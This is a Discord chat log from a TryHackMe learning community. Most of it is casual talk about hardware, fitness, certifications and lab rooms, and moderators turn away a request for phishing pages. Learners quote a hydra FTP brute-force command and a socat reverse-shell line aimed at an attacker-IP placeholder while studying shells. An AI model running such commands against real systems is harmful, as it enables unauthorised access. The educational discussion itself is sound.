#general

Hi guys

@slender scaffold got one engraved...

Built my first machine today 💚

the mean green machine?

The color is fire

Green and white

Or tealish something

Haha

does it go vroom vroom???

very vroom

whats in it

A v12

dunno why shadow is such a huge fan of Onomatopoeia

Ryzen 7 7800X3D
32GB RAM DDR5 6000Mhz CL30

And 4080 Super is on the way

cuz it isn't stupid.
Words sound like real things then

beep beep

beep beep boop beepity boop vrooom CREEE beep beep

love when computers used modems and sounded so neat

I can hear a very high pitch noise in my router when under load

Floppy disks, HDDs that go brr, speakers that pick up interference from phones

yeah computer sounds are neat and fun

Crappy switiching power supplies 😦

boooooooooooom

No no no toaster, this was back in the days of linears

ohh the 'good' old dayhs

I need some decent linears, but I want like 5v3a

Enough to burn up a 7805 etc

Ohhhh!!! So cute!!!

Terminator 3 could communicate via phone modem sounds lol

Gawd imagine how much backwards compatible they had to design that model before sending it

i am new can someone teach me the basic

#start-here

#start-here

I really don't know how this will work out

the pain of phone interface with terminals

🔥

My title will remain forever 🫡🫡

gobble gobble gobble

https://tenor.com/view/cat-cat-eat-cat-eating-kitten-kitten-eat-gif-27051616

^How CCG was

Chippi chippi chappa chappa

https://tenor.com/view/chipi-chapa-chipi-chipi-chipi-chipi-cat-chipi-chipi-dancing-cat-gif-10997735880837555564

https://tenor.com/view/cat-holding-apple-cat-cat-close-up-gif-1736986568061001246

Is Texas De brazil worth the price tho

For me yeah

Because it's open salad bar and all you can eat meat

So if u can eat lots then it's worth it and it's a nice experience 😎

Hmmmmm

Guess I should try when very hungry

You definitely should, better to go as a group 🥳

Gm

o/

It should be do brazil 😂

https://www.youtube.com/watch?v=TrMvv3hSG_k

lul

Anyone participating in cyberstorm?

what that???

what kind of sick question is this get the meat sweats!

I dunno! It’s a lot of money! Lol

No :<

so it's all you can eat. Waht they call the "market table" is probably the most expansive salad bar you've seen yet.... It's very possible to eat only from the market table and be satisifed. Lots of fancy cheeses, sides, and salad stuff. But the real star of the show is the meat brought around by the gauchos.

I recommend you try a little bit of everything on your first trip to one, and figure out what you like and what you really like.

I hope I can eat enough. But to experience it I guess it’s good to try at least once!

Hello guys man who have telegram groups here for cyber security

We don't allow advertising of telegram groups here

We might do that place again for THM meetup.

I might not go defcon this year 👀

My first time not going since I started

https://tenor.com/view/are-you-ok-checking-checking-you-are-you-alive-muppets-gif-20487286

Well defcon is my only vacation every year… I don’t have enough money to do anything else (I am underpaid)…. company doesn’t pay for it… I’m in desperate need of a real vacation

So what’s the deal with parrot os? I don’t know much about it other than people saying it’s better than Kali. Why exactly is that?

But Vegas!

Stay a little before or after, that way you can relax a bit

I’m going to ask my company if they’ll send me or cover part but I doubt it

I gave up on it after it pulled packages from Yandex out of the box

You don't want to share your box with Vlad and all his comrades?

Lol

It's not your box, it's our box

I like your name

https://tenor.com/view/soviet-cat-sovicat-soviet-ussr-cat-gif-21826197

HIIIII

https://tenor.com/view/emy-départ-gif-18075952005016085494

me waiting for response

Yoo

Tu 😂

xedo

ban.py executed

Tuxedo

Finnaly getting used to wireshark

Last time I tried it, most of the packages that is readily available for Kali was in fact not for Parrot

It's obsess with cookies 😂

https://media.discordapp.net/attachments/412706833178951690/1080121818058342400/cat-chomp-fireball.gif

booo it should bounce back and forth

whos down to start CTFs sometime soon ( this / next week )

I havent started any but want to get into it.

im on tryhackme currently.

bro wireshark is frustrating fr

So parrot is just bs

Does it offer anything that Kali lacks?

is just light weight and more beginner friendly

https://intellipaat.com/blog/parrot-os-vs-kali-linux-difference/#Parrot_OS_vs._Kali_Linux_Comparison

I finished my work tasks 🎶 time to head home early

try tshark

ight

with larger pcaps tshark is probably better for handling stuffs

but sometimes graphical wireshark is more useful

Well it’s less of the graphical interface, it’s more of the amount of different cmds you can use

anyways this shadow whadow is now going for the long forgotten forbidden technique called meep moop sleep sloop to the beep boop

Who here's the resident gym person

me

50 Lat pull down 60 pound
50 vertical chest 60 pound
50 triceps extension 30 pound
50 shoulder press 75 pound
50 horizontal leg press 100 pound

Is this a lot or less

Went to gym after a couple of months

What are your sets?

Uh 10 or 25

Uhh, that's a very big difference

I just did whatever I could do then took a 10 second break and then did it again till I was at 50

did it all under 30 min

What are you trying to do? Build muscle, build strength or a bit of both?

strength

I'm building a wife

The robotics is almost there

So, for strength you want to lift heavy for little.
The recommended number is 5 for 5, meaning you do 5 heavy reps of 5 sets.
Then you want a 5 minute break between each set.

Now, this is more of an average number, this won't work for every workout and it will depend on the machine type.

You need to stop. This is not appropriate.

Ah no talking about engineering

hmm

How come we can't share memes

Sexist comments and comments that will make community members uncomfortable is not appropriate @serene wren
This is an infosec learning space, PG13

And what about the amount I did today, is it low or high

Ah that wasn't point towards anyone it was just an engineering statement

My bad if it offended you

Wayy too high. How long were you working out for?

30 min

You're really going to hurt yourself

yeah, going to reduce it from tmrw

This is what my Tuesday looks like, it takes around an hour

Is that Obsidian?

Hmm, gotta reduce it wayy down I think probably

took me a hour on one task 💀

Right now you don't want to focus on Strength or Muscle Building.
My biggest tip to you is just focus on your form and ensuring that you are doing the workouts correctly.

Separate your days. For example, if you are working out for 4 days, you want one day for legs, chest and back, shoulders and biceps, abs/ core and chest.
*this is an example, you will need to research the muscle groups etc.

Create a simple workout and then pick up weights that you can lift in a controlled manour. For example, for hammer curls, you want to lift the weight up to the top and then slowly carry it down without learning forwards or backwards, moving your shoulders or shaking.

It will take time and you may even feel embarrassed but it's super important to build a strong foundation.

anyone good with splunk alert creations? I am trying to troubleshoot an alert i am making

And don't be afraid to Google videos of people doing the exercises and even just picking up small weights and following the motion with the video.

#room-help

lordbee

is that a room?

its not a room

oh

its my own splunk instance

Hello !

hello georgine

o

Hi

Do you mean the JavaScript alert();

Or am i wrong

no

Just making an alert

Oh ok

How may i ask

in splunk

with spl

Splunk?

Spl?

Oh shit im dead

Wow thats goated

Keep it up

Im 15 but i do calisthenics in my home

Ngl i look jacked😎 😈

I wish I had gotten into weight training a little earlier

How much you lifting jabba

I lost some muscle mass over the last couple of weeks because I wasn't eating properly 🥲

Dips are considered weight training

What workout are you referring to?

Hm

Dumbbells

Incline bench? Bicep curls? Shoulder press?

What exercise tho

Shoulder press is always light weight

Always

But biceps are heavy

Bicep

Bicep curls for 8 reps I can do around 14kg each hand

For me i dont do weight lifting but lastime it was 10kg

How old are you?

20

nah

Damn

jabbas 14

LOL

💀

Fr?

Yeah

( no )

Ok good laughs out loudly

I joined TryHackMe's community when I was 15

time traveler

Sure is

Or 16, math is hard 😓

Math sucks

I began coding at 11 🤫

Even tho the world revolves around it

man there really wasn't much going on before thm and htb

nothing organized at least

Around the same, although I wasn't very good at technology when I was younger

Yeah maybe

I didn't know how to use mobile phones until I turned around 14/15 then one day I woke up and I just knew a ton about technology

grammatically confused tf outa me for a second cause we would've just called it grade 5

Coding prodigy

Hold on how does that work

Same but I understanded

Which?

Nah bro lost his mind

i need a beer

How were you not good at technology and wake up and just know how to use technology

I need to go to sleep 💤

How old are you?

¯_(ツ)_/¯

13/f/cali

You liar

13???

Cali linux hhahahaha

everyone was 13/f/cali at one point

What In the world

I genuinely don't know.
I owned an Xbox One and I had a Windows phone, that was about it.

Then, I applied for computer science at school and I could write Python without really trying to learn the language lol

back in the day of old

Was this the days of AOL and floppy drives? lol

Thats crazy

when asl meant something other than american sign language

Tbh I always had a fascination with technology but what forwarded even more was when I took a html build your own website course on Kahn academy lol

Back when I actively partook in Cyber I absorbed information like it was nothing

I was very good, wonder what happened ahah

Did you forget it all?

I think not

I still know most of it, it would probably take me a day or two before I could do difficult CTFs

I fell behind, I would be much further along if I didn’t burn out

@mossy river btw what is ur profession in cybersecurity

Bug hunting?

I’m a University Student

Hmm

Yeah i forgot lol

And I work at TryHackMe ofc

https://tenor.com/view/the-simpsons-homer-simpson-nerd-yelling-insult-gif-7884166

my discord crashed trying to send that

Not specifically

Must be a fun job

Love every second

Your discord is trying to stop you

Does tryhack me have a headquarter

It’s fighting back

at least once a night, lol

No

Fully remote

Not like htb

From home?

They have a headquarter

Do they? Interesting

Yeah they post yt shorts at a place

They have t-shirts

Employees

Etc

I mean that’s basically thm but no hq

Maybe

They got shirts and stuff

Didnt know

Nice

Ur place looks so clean lol

That’s that black hat sweat shirt be careful

Student housing ahah

Woah

@mossy river maybe You should go sleep

And me too

Potentially

Its 3 am for me

Goodbye

I will sleep ig

Gn

👋

some questions are so confusing

"what is the meaning of life?"

hamburgers and pizza

disappointed that fluff isn't online rn -- i wanted to know if he rememberd his thing ,-,

I went a sleep at 9 and woke up now for it to be 2am now gotta go back to sleep 😦

As gotta get up in 4 hours

better go to sleep then 💤

man, i'm tired af for some reason

there's so much that i still gotta do

Yeah

So am I, but I don't have to do shit 😂

Just used nano for the first time it its probably my favorite editor now

Never even used a terminal based editor before

vim >

Never used either ill take a look

once you figure out how to exit vim you get a special role on here

as you can see, nobody has it yet

LOL

exitin vim is the hardest

Isnt it :wq?

• enter

well that's one way

Never used and already know how to quit

aren't there 4 ways

there's like 37

just pulled that number outa nowhere but there's a bunch depending on what you wanna do and how you wanna do it

So pretty much an easy to learn, hard to master type of thing but for exiting a text editor

there is also :qall!

u should use that

always

man i just want my prs to get merged

am impatient

is there in room ithm that teach more about sockets

wssss

readme.md

"Verum is one of our top developers"

im half tempted to pr something like that into hashcat after talking to em about those PRs the other day

yo yo yo

@crude stump u alive

Maybe

damnit

we'll try again tm

ayay

Wsp

Nice color

Hello

man y'all are boring

Howdy

Who wants to actually exit vim though? can't code with VS... small shade thrown in jest

here is some random quiz i made: imagine you are a ethical hacker (dont mind the imagine if you already are) and you were just taking a peek through someone's computer and find a ransomware named **acc.deleter** . what should you do?

option 1: delete that ransomware

option 2: lock that ransomware using hacking (or not)

option 3: leave that ransomware

an ethical hacker wouldn't just randomly go poking through someone elses computer.

Say what now? Looking through someone else's computer? That's...not a terribly good idea.

that is just a question and not real

also am still learning how to be a ethical hacker

so i dont know some stuff

I know, it's just a bit of a sensitive topic here.

ok :/

good effort though.

hi. im testing out softwares i find on my buddys PC which he conseted me to do as I allow him to test stuff out on mine. Im using "blank grabber" and i was wondering if it is malware before i download. Thanks!

@whole yew

Yeah, please don't do this. If you don't know what you're doing, please don't try to investigate potential malware - you are more likely to spread it than to fix it. If you ( and your friend) think it's infected, run something a scan from software like malware bytes to repair and remediate.

It's also highly unethical to use a grabber on a "friends PC"

How would you "lock that ransomware using hacking" ?

I don't feel like going to work, good thing I could be at the office at 10 today

Worked from 7am till 5:30pm yesterday🥲

oh yeah i forgot that

am so dumb

maybe i need some improvements... STILL

Everybody does, don't worry.

You're always learning.

ok 🙂

guys i did a mistake today

feel for you. I have a long one coming up tonight, 2-6am maintenance window. then real work from 730 - whenever I say screw it.

What did you do?

bruh i recieved background verification check for my internship today

i was submitting my marksheets

Yeahhh, I had a migration window from after 5pm :/

Luckily only 2 minutes for migration but 25 minutes of troubleshooting cause one of my support people had issues

nd i havent recieved my 5th sem result yet i wrote a note saying that i didnt got my 4th sem result which i did nd i submitted that marksheet too ,what if they think that i m fake or something

i mistakenly wrote 4th instead of 5th

i mailed them regarding this idk when they will reply

there are companies who are revoking offer nd i m so overthinking rn

seems like an honest simple mistake. I don't know much about your situation, but its not like you lied to gave mis leading info, you just messed up a number.

yeah i mailed them quickly when i realised this

idk how are they gonna respond to this

if they get mad at me or something then i m done

I think you will be fine. it sounds like a simple typo and you caught it quickly

yeah lets see i hope it goes well thanks for the convo

np. keep us up to date with your journey, and good luck!

yeah thanksssssssss i will

he just clicks the link and it pops up in a discord webhook

we already know eachothers info lol

nothing to hide

@rapid merlin has been warned.

Morning

☕ mornin

hows the water today?

Morning

lmao discord scam in bio

Its fine just so much damage it's shocking

I seen some videos last night, thought of you right away. its so sad

This was at my apartment. The apartment next to me their whole balcony door smashed in

Was apparently the most rain here in 75 years

wowsers

You took the rain with you

The damage around me

@rapid merlin

Can you change your about me please, this isn't the sort of stuff we'd like to promote in this community.

:(:(:( that is insane.

@sick lance I am not familiar with the weather in your neck of the woods. weird question. Have you ever experienced snow?

We had snow a few days ago.

Granted, it wasn't much.

Snow in Spring, only in Scotland.

It rarely snows in scotlanr anymore except deep in the countryside

Thankfully where I live they have drains. 99% of the UAE have no drains so are really badly flooded

Wat!?

Glasgow doesn't get much snow, everywhere else does.

In my parts of the world, we don't really have spring. Canada has
winter, you thought it was spring, winter v2.0, summer

Yeah Glasgow never gets any anymore

Got some in January.

how long have you been in the UAE?

6 nearly 7 months

granted Scotland is a pretty large place, I don't want to sound ignorant and think that everyone knows everyone...but were you and scrubz friends IRL before you moved?

No. I joined this server last year that's how we know each other

There was almost a different server, but I left that before it all kicked off.

I like this community. Granted I am still VERY new to discord and don't fully understand everything yet. You guys are all really cool and helpful.

It is great

better then swiss cheese...it has tons of holes

Hey everyone!

Hope everyone's enjoying the spring

It was snowing yesterday

can relate, the temperature fell by 18 degrees in last 2 days

its starting to warm up here. Was able to sit on my deck with a book and coffee last night, that made me happy

do yall think its worth it for the premium

cause i ve been thinkin about it and idk if i should

Its cheap af to what u get

Worth it, if you gonna be invested

try it for a month, see if you like it...I been on premium for 3 days now. no regrets

i mean i have been studying for 3 years now but idk if i hsould get thm or htb

Htb is slightly better for advanced stuff, thb is overall

right now, I am enjoying THM more then xbox. If work didn't pay for it, I would have traded game pass for THM

Personal opinion

I have a question

Recently the max capacity of my battery was at 95% when I was on Windows. Now it's back at 100%.

I mean it may be miracle, but what can I check to be sure?

memory scans like malwarebytes don't show much, but it's not very reliable. I see a powershell log an hour ago

probbaly a miscalc on the battery

miscalc = miscalculation

I just had a dumb moment. I knew I had LFI, but the question asked for the hostname of the machine. spent 5mins working on RCE, before saying duhhh /etc/hostname

Everyones had to go off road to get round the flood

@this_is_me_. Hope everyone is okay.

Happens to the best of us.

😦 y'all stay safe out there

Will do

@brisk tree off road tesla is interesting

Better than it going in the flood ahaha would die

Those damages... Stay save.

Am I missing something on my Kali OVPN for the "Exploiting FTP" room?? It's saying this when I enter the syntax "hydra -t4 -l mike -P /usr/share/wordlists/rockyou.txt -vV [IP] ftp"... After that it's telling me "File for passwords not found: /usr/share/wordlists/rockyou.txt"

but worked fine on attackbox ?

rockyou is compressed on kali

any idea how I can fix it?

gzip -d file.gz

so in your case gzip -d /usr/share/wordlists/rockyou.txt.gz

thank you so much

np

if anyone now how to make phishing sites for facebook pls teach me i rlly need it (or where can i learn it)

nope

Hey. you know that's illegal and unethical right?

i dont need it for illegal things

?

my fb got hacked and fb support aint doing nothing so i need it to get my acc back

You can't make a second account?

That's illegal

And making a phishing page won't get your facebook back at all?

to get my acc back is illegal? (thats wild)

if i get owner of that acc to go into that page why not

Yes. You can't attack random people.

:hammer: rezo2131#0 has been banned.

Seeya.

Damn

We don't tolerate illegal or unethical actions here.

Makes sense

that was satisfying

indeed.

I wish there was a website which advertised that it can hack people for you but it would actually just log everyone that tries in a public list

Nah

That's illegal too

I'd have to research into the specifics, but I'm not sure that that'd be illegal

maybe making the info public, you'd have to probably make a way to get their info removed upon request

just put it in the ToS. lol

you'd have to get them to accept it

So a sign up service may work

If it was run by police? And the list was private?

if the list was private, it would be no different than data storage on any website

my website uses a database containing information stored by users and companies. It is a private list that only myself can access

they allow private information access to those who need it for work to flow

think about a HIPAA compliant app that stores patient data. It technically stores that in a database, and while it may be encrypted, it is still a private list that can be accessed without compromising compliancy

can anyone help me i have a quest dm me pls

Why do you need to DM?

can you state your quest here first?

bc i wanna sent an image

sorry will let you get this scrubz

What does the image feature?

gotta love administrative tasks

its in an try hack me exercise

just vibing to music while plugging in data in an excel sheet

Then you van verify with the link above then use #room-help please

music helps with everything

If you are making a public list that looks like:

This people tried to hack someone:
John Doe
Jane Doe
Piet Jansen
Emily Fabregas

Pretty sure that's illegal

whats in your playlist?

Only under false advertising

Nah, as long as you're compliant with data protection laws then you're fine

i am verified now

Mhh interesting

Beastie boys, Chali 2na, House Of Pain, the king of brooklyn B.I.G, Outkast, etc.

Now you can post Images in room help.

i post the image

But do you know what data about people would be illegal to publish then?

Email? Phone number? Social media profiles?

damn I like that list.

Investigate data protection laws.

Remembered beastie boys from shrek forever and therefore hit up that playlist

I'll do that

Thanksss

because of the Shrek movies I have All-star in like every playlist for my kid

I bought a Bestie Boys anthology, A-D.

I had to fight for the right to part E.

Pretty sure that in my country, doxxing is illegal

That's not doxxing

Imma read the law

ACME IT SUPPORT LAWYER has entered the chat 😄

doxxing is something else. That would be I find NinjaJc here on discord, and dig to find personal details about him to either make public, or threaten to

nice

usually that information is used to make threats towards one or their family

What we are discussing would be no different than the data Google stores about us, or you enter your name in a sign up form

oh btw, james, me and a friend found quite a big vulnerability yesterday

I think the catch is some states like California need to have the ability to remove information if they decide

bug bounty?

Nice!

yeahhh, like c suite meetings kinda vuln 😅

can't say much about it

The only real difference is publishing it.
If the ToS says "we collect any details you enter in this form and reserve the right to make it public" then...

data collection is a really weird topic. Some regulations just seem way too lose for me.

Man it's great when you find stuff that could destroy the company, but you do feel sorry that someone might get fired because of it

can I dm you?

Yeah but don't break your NDA

yeah of course

right. If it is stated in the ToS, and the ToS is agreed to and publicly available, then you are pretty set I'd say

they can be, yeah

"yea we collect everything about you because insert sad excuse here. Trust us bro."
how about no.

lol

then don't sign up

they can only do that if you agree to it, legally

they can do it either way

but legally you have to agree to anything

eJPT is shit badge caught me offguard

cause it is 😎

I regret getting it ngl

nah good for a starting point

narhh, too pricy for what you learn and the fact that you can pass it with no knowledge needed is not good for a cybersec cert

you spend 200 bucks for basic knowledge of THE BASIC of pentesting. Passing the exam just requires a cheatsheet

real problem with it is that is VERY VERY VERY slow

the instructors were monotone af.

lord , so true

they are actually redoing all the learning materials because of that

they repeated the same thing 1958 times

they are throwing out that one guy

tbh if they cut all the monotony , and reduce hours from 150 to , idk like 70

its way better

and reduce the price

and make it so you don't have to pay 750 USD for the boxes

750 wut

i payed it 200 usd

you got access to all the learning material on INE?

yeah for 180 days

also the training boxes?

hmm

with 200 bucks you can follow all videos and train boxes for certification

my management team said the prices were really shifty.

when I took it, they gave us the 180 days and threw in the cert for half the price

hmmm idk , for me the problem was not the price , was the fact that a guy explained me how to use NMAP for 40hrs

but for sure there are different POV on prices

200bucks for certifications and labs seems fair to me

surely less heavy than OSCP

I was going to get the eWPT, but decided it wouldn't be worth the time/money

instead did the coursework for CBBH

and will test soon

after eJPT i went straight forward the OSCP tbh

tbf, I only needed 7 days and then solved the exam in 9 hours (this was before I had joined THM even)

ok , but you already had basics

or did this for work

nope

from 0?

yee

I had only done like 1-2 ctfs

this was back in 2021

well kinda impressive

it took me 15 days tbh

and i had to watch that slow sheet for 10 hrs a day

I did it in my thanksgiving vacation

well as i said before at least they explain you passive and active IG , BASIC (VERY BASIC) enumeration , and the basic of every tool

not so bad

the junior pentesting path on thm teaches you more than eJPT

😄

I should take ejpt

CBBH seems like it goes pretty in depth

imagine passing it in 2 hours

def a good mid level cert

cbbh is very fun , i'd like to dive into it ngl

problem with HTB is that they write too much

Imagine me failing it! More fun!

it's uhmm... multiple choice

you can't fail it

you will not fail

lmao

Challenge accepted

in 24hr you have a BLACKBOX PT

and you can access to your cheat sheet

oh, it's only 24hr?

when I took it it was 48 hours

Me and my random number generator

Will attempt to fail

they changed exam and some videos since 2021

yeah, I know, just didn't think they changed the time amount

you write :"ping 8.8.8.8 " you get admin access

no its too slow , as i said 150hrs = 70 hrs (maybe 60)

there is a guy who get a pause every 2 words

I def skipped over parts based on how much I knew of the subject

but I also have another web cert, and experience in web testing

ah wait we are talking about "if you are at 0 knowledge"

if you are at 0 , its not so bad

if you have already experience , not worth it

I do like that it explains preventative measures to vulnerabilities

for CBBH I think it's worth it

even with experience

there are certain bypasses I learned that I hadn't used before

yeah but CBBH is an intermediate level

not sure basic

but patch : eJPT - CBBH seems fair to me tbh

This week is extra long for some reason

is JPT web focused?

i didn't think it was

i'd suggest PJWT from TCM, then CBBH

eJWT is

or whatever it's called

eJPT is web focused .
All depens on : how much money you want spend and what is your favourite learning process.
Surely PJWT is a valid alternative

eJPT is more infrastructure than web

uuuuh nice , what was your path ? eJPT >>>> OSCP?

how can i hack nasa

very simple . Ping 127.0.0.1 , then restart your pc

well done , you are now Nasa admin

oh thanks mate

love u

no problem

as far as I understand, eJPT is marketed at a network pentesting certification. eJWT is a web, while eWPT is the next web cert

eWPT should be the "EXPERT" level web application certification , but tbh i kinda doubt it . I think that OffSec offer more valid certification at "expert" level

eJPT touch every argument of penetration testing . Starting from infrastrocture to conclude (last 30-40hrs) with web application

Hi

"This certification exam covers Assessment Methodologies, Host and Network Auditing, Host and Network Penetration Testing, and Web Application Penetration Testing."

Once I deploy the VM, and in my own vm, after connecting to VPN what should I do?

Should I also ssh connect?

What do you WANT to do

ssh tryhackme@macine_ip?

yeah but eJPT doesn't touch Ffuf , that it's a milestone in Web Application PT

I am on the file inclusion room, following task

for what?

ah , You are in the wrong channel

but wait let me take a look

Alright, you should go to #room-help 🙂

#site-support please.

oh

@random scroll switch channel and write : the room and the task you want help

mmmm, no. It is mid level. They have a different expert level cert

https://security.ine.com/certifications/ewptx-certification/

this is their expert

sorry got confused , their name are allt he same

yeah lol

yes, but I consider eJPT only as a fun CTF, that is pretty expensive 😄

but it’s better to have eJPT than no certs in my opinion

yeah as i said good if you are at 0 level

i'd like to get OSCP too , but kinda afrait , ngl

the level varies for everyone, I know people that did not pass on their first attempt

try the Proving Grounds Practice boxes, some of those are real OSCP machines, if you can tackle those then the course and exam should not be too hard for you

ty a lot man

Gave +1 Rep to @mint palm (current: #264 - 19)

+rep @mint palm

@hasty sand How does it look

Which library are u using for all the colors and formatting etc?

Im not using any library, its all stdlib xD

# Initialize logger
class CustomFormatter(logging.Formatter):
    """Logging Formatter to add colors"""

    format = "%(message)s"
    FORMATS = {
        logging.DEBUG: format,  # White
        logging.INFO: format,  # Cyan
        logging.ERROR: format,  # Red
    }

    def format(self, record):
        log_fmt = self.FORMATS.get(record.levelno)
        formatter = logging.Formatter(log_fmt)
        return formatter.format(record)

# Create a logger object
logger = logging.getLogger(__name__)

# Configure logger
console_handler = logging.StreamHandler()
console_handler.setFormatter(CustomFormatter())
logger.addHandler(console_handler)
logger.setLevel(logging.INFO)

CYAN = "\033[0;36m"
GREEN = "\033[0;32m"
RED = "\033[0;31m"
BOLD = "\033[1m"
UNDERLINE = "\033[4m"
RESET = "\033[0m"

Can recommend rich in that case

I try not to use any external dependencies

is that on tablet?

Very good for all exploit dev needs

Fair enough

Yes I have used rich in my other projects, great library but here I have challenged myself not to use any third party libs

That would use python's logging right?

yes exactly

logging is inbuilt

I hate entering references.

Teach me go or rust

Learn rust

I want to. But i don't want to

Does that make sense?

I can't teach it, not good enough yet

yes I have the same problem

Did discord change the font for code blocks?

Proper monospace font now

print("hello world")

hmmm

Yes.

does look slightly different

for the better

yes

Zig gang

nim

i want to study CRTO but i dont want to at the same time

Heard a song recently

https://tenor.com/view/nike-ardanın-amk-gif-25713117

Dear McCracken

And that's how i read your name now

https://youtu.be/aWGolv2iqM0

Yeah on desktop

So the app would copy the payload in clipboard or print it out to stdout? If clipboard, how you handle that with stdlib only? Besides calling for xclip and such

@buoyant tree mind if I DM?

Mobile too. On phone now

The difference in reverse and binding shells is that:

Reverse shells send output to us from the exectuion of commands on the target machine
Binding shells expect input from us on the target machine

Have I understood it correctly?

No

The communication once the connection is made is biderictional. The difference is who listens and waits for who to connect

They both expect input from you and send you the output

But on the revshell we listen

stay strong soldier 🖖

While on the binding they listen?

Yes

Why did they mention that revshells usually bypass firewall rules easier?

I mean in both scenarios we send data to the machine behind the firewall

Outbound firewall rules are generally loose

Inbound firewall rules generally block anything that they haven't made an exception for

Thank you both!

This was useful

Jeez the shell room is hardcore

And it's "easy"

Feel my brain fried

You'll get the hang of it

Just keep notes

Without notes I am a lost soul

OneNote and Notepad/Notepad++ for the win

But I might start utilizing Obsidian

Yeah i just started using Obsidian

And its a bit better than onenote

Basically Obsidian is probably the better notepad version

But notepad++ is also fire

The obsidian GUI is much much better. What I liked about onenote is that it gave the source of the room where the content came from.

The cli won't copy it to the clipboard. I originally thought of this, but it seemed weird to overwrite the clipboard with a shell payload.
It will format the payload using the target address/port given and print it to the stdout. It will then start a listener if the appropriate argument was provided

This is the secret to winning

VSCodium and Joplin is my goto 😄

I can't believe the project is almost finished :O its only been 2 days

What exact notes do yall make? Important things of every room yall do?

@gray sonnet you made somthing similar eh?

Everything, Rooms, tools, techniques (Rooms not so much)

But that's good when you're learning.

EDR evasion things, bits/snippets of code depending what I'm doing

The VSCodium change, added labels to the code map, It's really really handy

And then defender erases everything

Yup

I write a brief explanation of what i've read.

Mhhh

Is it possible to make my own box with a certain vunerability, then apply a patch to it to show how it was done/patched

Room?

sure

like a room i guess

But for yourself, or as a room on tryhackme?

yes

Thank god for encryption, Screw obsidian 😄

Gave +1 Rep to @jagged moon (current: #12 - 559)

That's just called a VM haha

Obsidian is really that bad huh

The devs are worse!

Oof good thing I got out early

Sure, i mean im just trying to setup a VM i guess that is able to demonstrate the vunerability/how its patched

tell me what steps you think you'll need.

1, VM, 2, some sort of server thatl host the vunrerability, 3, a way of updating the vunerabale bit of software that is vunerable when i want to patch it@?

Is this homework?

can anyone help me with the malware introductory? it keeps saying my SHA-256 Checksum is incorrect

You need atleast 1 more step

#room-help please.

oh okay mb

Testing the vunerability? 😄

yep lol

Only the most important thing 😄

i guess my real simple question is, is there a way for me to create a room with these steps

Well yes

basicly doing Solar room with the log4j

But unless it's unique to the THM platform, it's gonna remain private

then a version where the patch has been implemented

snapshots?

aka i think its 14.1 then 16.0?

might be

not sure of the term

First come up with a killchain

Would this be a good explanatory site for binding and reverse shells https://medium.com/@Proclus/reverse-bind-shells-for-everyoned-e7507853bf4e ?

THEN think about how you're going to implement it

Like in reverse shells, we must unload a payload onto the victim machine, which will try to connect to us as we listen

But is better to bypass firewalls

Ive done the exploit before, i think im just struggling with implementing the room / vm / enviroment

And in binding shells we deliver a payload to make the target machine listen for our commands

?

Try harder 😄

I took forever to get shit working for my room

Lots of troubleshooting

Original question was, "is it possible to make the room on thm"

Yes

so im assuming by these replies, "yes"

😄

sweet

socat TCP:<attacker-ip>:<attacker-port> EXEC:"bash -li",pty,stderr,sigint,setsid,sane

This is a binding shell command, right?

When a mod is online ask them to give you the creators-lounge role

You can ask questions about your room dev there

sigh

Hey scrubz 👋

Ola Scrubz 👋🏻

lol!

When a mod is online

I've been here the whole time 😭

Do you mind 😆

Well mobile doesn't show me that

I blame discord

Are you a mod? :p

Its clearly the invisible photo 😄

➕ Gave the role Creators-Lounge to lucifer_1_

Thanking you 🙂

Wooo

What can you do with this creators lounge role

We all know you a fake mod tho

https://tenor.com/view/imposter-907-sus-gif-25340295

Get access to the creators-lounge channel

I wonder about the day when I migrate completely to linux

I wonder what my daily would be

Debian/Ubuntu perhaps

Mint?

https://tenor.com/view/cliphy-happy-mind-happy-life-about-life-thoughts-happiness-gif-13169012

Maybe something minimalistic like XFCE GUI

Since it would also be less-likely to break

To those who install arch

Do you remember all of the commands, or just use the guide?

For installation that is

I twice tried installing Arch with Hyprland, that is something you dont want to do again 🙂

What is hyprland

A GUI.

https://hyprland.org/

Xfce is nice

I'd love to see it

It's BAD lol

Who cares!

i will be tackling AV evasion now 🥲

That's the best part!

fun times

Just curious, which studies do this?

Computer science?

Because in my country its a bit different xd

Doesn't matter i think

@boreal scarab piiing... u here ?

Anyone know if I can bypass a 413 error on my web server using FTP? Don't want to change the limitations anywhere but this one file upload form

php

can you split the file in smaller parts ?

How do i connect to the attackbox via VNC/RDP?

ik you can change in php.ini max file upload size

I thought about that, and then I wondered if splitting and putting them back together would cause any issues

I've also tried that, yet I'm still getting 413 with a 20mb file